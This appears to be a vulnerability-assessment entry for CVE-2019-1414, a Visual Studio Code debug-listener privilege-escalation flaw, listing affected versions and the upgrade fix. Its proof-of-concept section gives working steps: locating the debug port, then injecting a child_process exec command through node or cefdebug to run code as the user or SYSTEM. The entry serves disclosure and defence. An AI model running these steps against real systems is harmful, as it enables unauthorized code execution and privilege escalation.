CVE-2019-1414

An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer, aka ‘Visual Studio Code Elevation of Privilege Vulnerability’.

Recent assessments:

goodlandsecurity at May 20, 2020 2:28am UTC reported:

Vulnerability:

• An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer. A local attacker who successfully exploited the vulnerability could inject arbitrary code to run in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Software Versions Affected:

• All versions < 1.39.1

Vulnerability Severity:

• High

Vulnerability Fix:

• Upgrade VS Code to version 1.39.1 or later.

Vulnerability POC:

• If Visual Studio code runs as Administrator, privileges can be elevated to the highest level, i.e. NT AUTHORITY\SYSTEM.

• If Visual Studio Code runs as another user, command execution can be achieved as that user.

• If Visual Studio Code runs in High Integrity context, any UAC settings can bypassed and can elevate from Low/Medium levels.

• Linux (Article detailing the exploit):

  1. ps aux | grep inspect
  • Find the debug port
  2. node index.js 127.0.0.1 <PORT> <COMMAND>
  • Run index.js supplied with the ip address, port, and command you want to run

• Windows:

  1. ./cefdebug.exe

  • Find the debug port

  • cefdebug is a minimal commandline utility and/or reference code for using libwebsockets to connect to an electron/CEF/chromium debugger.
    2 ./cefdebug.exe —url ws://127.0.0.1:<PORT>/<UUID> —code “process.mainModule.require(‘child_process’).exec(’<COMMAND>’)”

  • Run cefdebug supplied with the debug websocket url and the command you want to run

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 3